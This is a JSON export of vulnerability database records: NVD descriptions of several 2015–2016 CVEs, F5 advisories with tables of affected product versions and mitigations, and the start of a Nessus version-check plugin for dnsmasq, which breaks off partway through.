{"cve": [{"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Dnsmasq before 2.76 allows remote servers to cause a denial of service (crash) via a reply with an empty DNS address that has an (1) A or (2) AAAA record defined locally.", "modified": "2016-11-28T19:50:00", "id": "CVE-2015-8899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8899", "published": "2016-06-30T17:59:00", "title": "CVE-2015-8899", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-30T12:56:36", "bulletinFamily": "NVD", "description": "Race condition in wget 1.17 and earlier, when used in recursive or mirroring mode to download a single file, might allow remote servers to bypass intended access list restrictions by keeping an HTTP connection open.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-7098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098", "published": "2016-09-26T14:59:00", "title": "CVE-2016-7098", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "HAproxy 1.6.x before 1.6.6, when a deny comes from a reqdeny rule, allows remote attackers to cause a denial of service (uninitialized memory access and crash) or possibly have unspecified other impact via unknown vectors.", "modified": "2016-07-01T22:28:00", "id": "CVE-2016-5360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5360", "published": "2016-06-30T17:59:00", "title": "CVE-2016-5360", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Multiple integer underflows in Grub2 1.98 through 2.02 allow physically proximate attackers to bypass authentication, obtain sensitive information, or cause a denial of service (disk corruption) via backspace characters in the (1) grub_username_get function in grub-core/normal/auth.c or the (2) grub_password_get function in lib/crypto.c, which trigger an \"Off-by-two\" or \"Out of bounds overwrite\" memory error.", "modified": "2018-10-09T19:58:00", "id": "CVE-2015-8370", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8370", "published": "2015-12-16T21:59:00", "title": "CVE-2015-8370", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "drivers/vfio/pci/vfio_pci.c in the Linux kernel through 4.8.11 allows local users to bypass integer overflow checks, and cause a denial of service (memory corruption) or have unspecified other impact, by leveraging access to a vfio PCI device file for a VFIO_DEVICE_SET_IRQS ioctl call, aka a \"state machine confusion bug.\"", "modified": "2018-01-05T02:31:00", "id": "CVE-2016-9083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9083", "published": "2016-11-28T03:59:00", "title": "CVE-2016-9083", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:15:36", "bulletinFamily": "NVD", "description": "os/unix/ngx_files.c in nginx before 1.10.1 and 1.11.x before 1.11.1 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a crafted request, involving writing a client request body to a temporary file.\n<a href=\"http://cwe.mitre.org/data/definitions/476.html\">CWE-476: NULL Pointer Dereference</a>", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-4450", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4450", "published": "2016-06-07T14:06:00", "title": "CVE-2016-4450", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:15:41", "bulletinFamily": "NVD", "description": "The sctp_sf_ootb function in net/sctp/sm_statefuns.c in the Linux kernel before 4.8.8 lacks chunk-length checking for the first chunk, which allows remote attackers to cause a denial of service (out-of-bounds slab access) or possibly have unspecified other impact via crafted SCTP data.", "modified": "2018-08-13T21:47:00", "id": "CVE-2016-9555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9555", "published": "2016-11-28T03:59:00", "title": "CVE-2016-9555", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T13:24:04", "bulletinFamily": "NVD", "description": "Buffer overflow in the C cli shell in Apache Zookeeper before 3.4.9 and 3.5.x before 3.5.3, when using the \"cmd:\" batch mode syntax, allows attackers to have unspecified impact via a long command string.", "modified": "2017-03-24T01:59:00", "id": "CVE-2016-5017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5017", "published": "2016-09-21T14:25:00", "title": "CVE-2016-5017", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:33", "bulletinFamily": "NVD", "description": "vim before patch 8.0.0056 does not properly validate values for the 'filetype', 'syntax' and 'keymap' options, which may result in the execution of arbitrary code if a file with a specially crafted modeline is opened.", "modified": "2017-07-28T01:29:00", "id": "CVE-2016-1248", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1248", "published": "2016-11-23T15:59:00", "title": "CVE-2016-1248", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2017-06-08T00:16:03", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 565911 (BIG-IP), ID 566052 (Enterprise Manager), and ID 566050 (BIG-IQ) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.3.0 - 11.6.0| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Low| GRUB2* \nBIG-IP AAM| 12.0.0 \n11.4.0 - 11.6.0| None| Low| GRUB2* \nBIG-IP AFM| 12.0.0 \n11.3.0 - 11.6.0| None| Low| GRUB2* \nBIG-IP Analytics| 12.0.0 \n11.3.0 - 11.6.0| 11.0.0 - 11.2.1| Low| GRUB2* \nBIG-IP APM| 12.0.0 \n11.3.0 - 11.6.0| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Low| GRUB2* \nBIG-IP ASM| 12.0.0 \n11.3.0 - 11.6.0| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Low| GRUB2* \nBIG-IP DNS| 12.0.0| None| Low| GRUB2* \nBIG-IP Edge Gateway| 11.3.0 \n| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Low| GRUB2* \nBIG-IP GTM| 11.3.0 - 11.6.0| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Low| GRUB2* \nBIG-IP Link Controller| 12.0.0 \n11.3.0 - 11.6.0| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Low| GRUB2* \nBIG-IP PEM| 12.0.0 \n11.3.0 - 11.6.0| None| Low| GRUB2* \nBIG-IP PSM| 11.3.0 - 11.4.1| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Low| GRUB2* \nBIG-IP WebAccelerator| 11.3.0| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Low| GRUB2* \nBIG-IP WOM| 11.3.0| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Low| GRUB2* \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| GRUB2* \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| GRUB2* \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| GRUB2* \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| GRUB2* \nBIG-IQ ADC| 4.5.0| None| Low| GRUB2* \nBIG-IQ Centralized Management| 4.6.0| None| Low| GRUB2* \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| GRUB2* \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n* The system is vulnerable only if a customized GRUB2 configuration is applied.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the** Severity** values published in the previous table. The** Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability, you can maintain affected products in a secure location, which limits physical access to the device.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K14658: Determining the GRUB bootloader version on the BIG-IP system](<https://support.f5.com/csp/article/K14658>)\n", "modified": "2016-01-12T19:42:00", "published": "2016-01-12T19:42:00", "id": "F5:K25901386", "href": "https://support.f5.com/csp/article/K25901386", "title": "GRUB2 vulnerability CVE-2015-8370", "type": "f5", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-03T05:27:58", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the** Severity** values published in the previous table. The** Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you can maintain affected products in a secure location, which limits physical access to the device.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n * SOL14658: Determining the GRUB bootloader version on the BIG-IP system\n", "modified": "2016-01-12T00:00:00", "published": "2016-01-12T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/25/sol25901386.html", "id": "SOL25901386", "type": "f5", "title": "SOL25901386 - GRUB2 vulnerability CVE-2015-8370", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:19", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 619926 (F5 iWorkflow) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.0 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| Nginx \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| Nginx \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| Nginx \nBIG-IQ ADC| 4.5.0| None| Medium| Nginx \nBIG-IQ Centralized Management| 5.0.0 \n4.6.0| 5.1.0| Medium| Nginx \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| Nginx \nF5 iWorkflow| 2.0.0| None| Medium| Nginx \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n", "modified": "2016-10-04T19:13:00", "published": "2016-10-04T02:31:00", "href": "https://support.f5.com/csp/article/K08250500", "id": "F5:K08250500", "title": "Nginx vulnerability CVE-2016-4450", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-10-23T04:30:22", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 635314 (BIG-IP), ID 651261 (Enterprise Manager), ID 651287 (BIG-IQ), ID 651658 (iWorkflow), and CPF-23577 (Traffix) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H22183127 on the **Diagnostics** > **Identified** > **Low** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.5.5 \n11.6.0 - 11.6.1 \n11.2.1 | 13.1.0 \n12.1.3 \n11.6.2 \n11.5.6 | Low | Vim \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.5.5 \n11.6.0 - 11.6.1 | 13.1.0 \n12.1.3 \n11.6.2 \n11.5.6 | Low | Vim \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.5.5 \n11.6.0 - 11.6.1 | 13.1.0 \n12.1.3 \n11.6.2 \n11.5.6 | Low | Vim \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.5.5 \n11.6.0 - 11.6.1 \n11.2.1 | 13.1.0 \n12.1.3 \n11.6.2 \n11.5.6 | Low | Vim \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.5.5 \n11.6.0 - 11.6.1 \n11.2.1 | 13.1.0 \n12.1.3 \n11.6.2 \n11.5.6 | Low | Vim \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.5.5 \n11.6.0 - 11.6.1 \n11.2.1 | 13.1.0 \n12.1.3 \n11.6.2 \n11.5.6 | Low | Vim \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.1.0 \n12.1.3 | Low | Vim \nBIG-IP Edge Gateway | 11.2.1 | None | Low | Vim \nBIG-IP GTM | 11.4.0 - 11.5.5 \n11.6.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.5.6 | Low | Vim \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.5.5 \n11.6.0 - 11.6.1 \n11.2.1 | 13.1.0 \n12.1.3 \n11.6.2 \n11.5.6 | Low | Vim \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.5.5 \n11.6.0 - 11.6.1 | 13.1.0 \n12.1.3 \n11.6.2 \n11.5.6 | Low | Vim \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Low | Vim \nBIG-IP WebAccelerator | 11.2.1 | None | Low | Vim \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.1.0 \n12.1.3 \n11.6.2 | Low | Vim \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Low | Vim \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | \nNone | Low | Vim \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | Vim \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | Vim \nBIG-IQ ADC | 4.5.0 | None | Low | Vim \nBIG-IQ Centralized Management | 5.0.0 - 5.3.0 \n4.6.0 | None | Low | Vim \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | Vim \nF5 iWorkflow | 2.0.0 - 2.3.0 | None | Low | Vim \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Medium | Vim\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can disable **modeline** on the **.vimrc** configuration file if the file has been customized in the affected systems.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2018-04-16T20:07:00", "published": "2017-03-21T01:47:00", "id": "F5:K22183127", "href": "https://support.f5.com/csp/article/K22183127", "title": "Vim vulnerability CVE-2016-1248", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-03T22:46:54", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned IDs 641319 and 648879 (BIG-IP), ID 641319-1 (BIG-IQ), ID 643805 (Enterprise Manager), and ID 646642 (F5 iWorkflow) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.2 \n11.2.1 | Not vulnerable1 | None \nBIG-IP AAM | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.2 | Not vulnerable1 | None \nBIG-IP AFM | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.2 | Not vulnerable1 | None \nBIG-IP Analytics | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.2 \n11.2.1 | Not vulnerable1 | None \nBIG-IP APM | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.2 \n11.2.1 | Not vulnerable1 | None \nBIG-IP ASM | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.2 \n11.2.1 | Not vulnerable1 | None \nBIG-IP DNS | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 | Not vulnerable1 | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable1 | None \nBIG-IP GTM | None | 11.4.0 - 11.6.2 \n11.2.1 | Not vulnerable1 | None \nBIG-IP Link Controller | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.2 \n11.2.1 | Not vulnerable1 | None \nBIG-IP PEM | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.2 | Not vulnerable1 | None \nBIG-IP PSM | None | 11.4.0 - 11.4.1 | Not vulnerable1 | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable1 | None \nBIG-IP WebSafe | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.2 | Not vulnerable1 | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable1 | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable1 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable1 | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable1 | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable1 | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable1 | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.1.0 \n4.6.0 | Not vulnerable1 | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable1 | None \nF5 iWorkflow | None | 2.0.0 - 2.0.2 | Not vulnerable1 | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable1 | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel \n \n1 The specified products may contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2017-12-21T19:45:00", "published": "2017-02-23T01:21:00", "id": "F5:K54095660", "href": "https://support.f5.com/csp/article/K54095660", "title": "Linux kernel vulnerability CVE-2016-9555", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-04T17:24:42", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to SOL21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n", "modified": "2016-10-04T00:00:00", "published": "2016-10-03T00:00:00", "id": "SOL08250500", "href": "http://support.f5.com/kb/en-us/solutions/public/k/08/sol08250500.html", "type": "f5", "title": "SOL08250500 - Nginx vulnerability CVE-2016-4450", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2020-05-03T02:15:02", "bulletinFamily": "scanner", "description": "The version of dnsmasq installed on the remote host is at least 2.73\nand prior to 2.76, and thus, is affected by a denial of service\nvulnerability when handling a reply that a given name is empty while\nthe A or AAAA record is defined locally and in a hosts file.", "modified": "2020-05-02T00:00:00", "id": "DNSMASQ_2_76.NASL", "href": "https://www.tenable.com/plugins/nessus/106138", "published": "2018-01-18T00:00:00", "title": "dnsmasq < 2.76 Empty Address Denial of Service (CVE-2015-8899)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106138);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2015-8899\");\n script_bugtraq_id(91031);\n\n script_name(english:\"dnsmasq < 2.76 Empty Address Denial of Service (CVE-2015-8899)\");\n script_summary(english:\"Checks the version of dnsmasq\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote DNS / DHCP service is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of dnsmasq installed on the remote host is at least 2.73\nand prior to 2.76, and thus, is affected by a denial of service\nvulnerability when handling a reply that a given name is empty while\nthe A or AAAA record is defined locally and in a hosts file.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.thekelleys.org.uk/dnsmasq/CHANGELOG\");\n # http://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2016q2/010479.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1481bb05\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to dnsmasq 2.76 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8899\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/18\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:thekelleys:dnsmasq\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"DNS\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"dns_version.nasl\");\n 